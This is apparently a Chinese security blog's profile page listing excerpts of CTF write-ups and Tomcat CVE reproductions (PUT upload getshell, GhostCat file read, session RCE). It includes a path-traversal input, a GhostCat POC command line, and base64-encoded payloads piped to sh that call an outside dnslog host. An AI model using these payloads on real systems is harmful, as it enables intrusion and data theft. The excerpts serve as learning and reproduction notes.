- 博客(8)
- 资源 (4)
- 收藏
- 关注
RSS订阅原创 windows10打开kali运行扫描端口工具win10就蓝屏-SYSTEM_SERVICE_EXCEPTION AND DPC_WATCHDOG_VIOLATION
虚拟机kali使用nmap或者masscan,就会导致win10主机蓝屏。本人原因是因为Wise System Monitor流量监控软件所导致取消开机自启就行。
2020-06-20 20:40:30
1258
原创 ISCC-2020-WEB-What can images do-writep
WEBWhat can images do(文件包含+文件上传)其实序列号也做出来了,没有立马写后来就忘了。当时立马写wp的只有这个一个。题目:http://101.201.126.95:7004/可以看到有个filename,参数是文件名。可以试试包含../../../../etc/passwd成功但是不知道后台是include还是file_get_content。(这两者是有区别的可以参考这里,(链接11))然后我们再尝试一下php文件,可以看到包含了。那么就是include。然
2020-05-31 21:13:17
359
原创 cve-2017-12615-put上传漏洞
漏洞危害在readonly配置为true的情况下,可以通过PUT上传jsp文件进行getshell影响版本7.0.0-7.0.79漏洞前提条件readonle为true版本为7.0.0-7.0.79靶机环境centos 7tomcat 7.0.61漏洞复现在tomcat的web.xml配置文件中添加 <init-param> <param-name>readonly</param-name>
2020-05-28 18:52:05
246
原创 CVE-2020-1938-GhostCat(幽灵猫)漏洞复现
漏洞危害可以读取/包含,webapps下的任意文件。影响版本9.0.0.M1 to 9.0.0.308.5.0 to 8.5.507.0.0 to 7.0.99漏洞前提条件版本参考上面一条开启8009也就是AJP端口(默认开启)复现环境centos 7tomcat 7.0.61漏洞复现POC使用POCpython2 .\CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.52 -f WEB-INF/web.xml这是读取ROOT
2020-05-27 19:55:16
745
原创 cve-2020-9484 Tomcat session RCE复现以及tomcat踩坑
漏洞影响10.0.0-M1至10.0.0-M49.0.0.0.M1至9.0.348.5.0至8.5.547.0.0至7.0.103漏洞条件tomcat 版本为10.0.0-M1至10.0.0-M49.0.0.0.M1至9.0.348.5.0至8.5.547.0.0至7.0.103开启session存在文件上传(可以指定上传文件后缀为session并且知道上传文件路径)漏洞复现环境centos7tomcat 9.0.34前期踩坑centos安装tomcat
2020-05-26 11:28:45
1658
原创 2020年DASCTF五月线上赛-WEB-小红花
小红花很明显是命令执行,但肯定有过滤.首先看函数shell_exec他会执行系统命令,并把执行结果返回出来。但看提示似乎没有把返回结果打印测试后也证实了这个想法。那么就首先尝试外带了。dnslog外带-失败尝试过以后payload都没有成功。听别人说之前有人成功过是因为非预期后来再进行尝试就没有成功了。echo Y3VybCBibC50ZXN0LmRuc2xvZy5saW5rIA==|base64 -d |shecho MN2XE3BAMJWC45DFON2C4ZDOONWG6ZZONRUW
2020-05-24 19:42:35
1239
翻译 Error opening registry key'software\Javasoft\Java Runtime Environment' 问题解决和其他解决方案不同
java-jdk13 Error opening registry key’software\Javasoft\Java Runtime Environment’ 问题解决和其他解决方案不同找了网上其他的解决方案,发现前几页百度的解决方案都是一样一样的。就很恶心。按照他们的方法都试了一遍没有用,之后在这里找到了解决方案。C:\ProgramData\Oracle\Java\javapath。这...
2020-05-02 15:00:55
674
原创 并发并行和同步异步的概念
文章目录并发和并行并发并行同步和异步同步异步并发和并行并发指在某一时间段多个程序(任务)都是串行执行的,而不是在某一个时间点上都处于运行状态。一个时间点上只有一个程序或任务在运行。在同一时间中多个线程运行,如果系统只有一个cpu则它不可能同时进行一个以上的线程,只能对cpu运行时间进行划分,再将不同的线程安排到不同的时间中去运行。个人理解:也就是说并发是指,一段时间里运行多个程序或者是任...
2020-01-22 19:04:23
401
1
PHP20多道练习题及算法题
2019-01-07
字典(包含弱口令,目录,后台)
2018-11-30
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人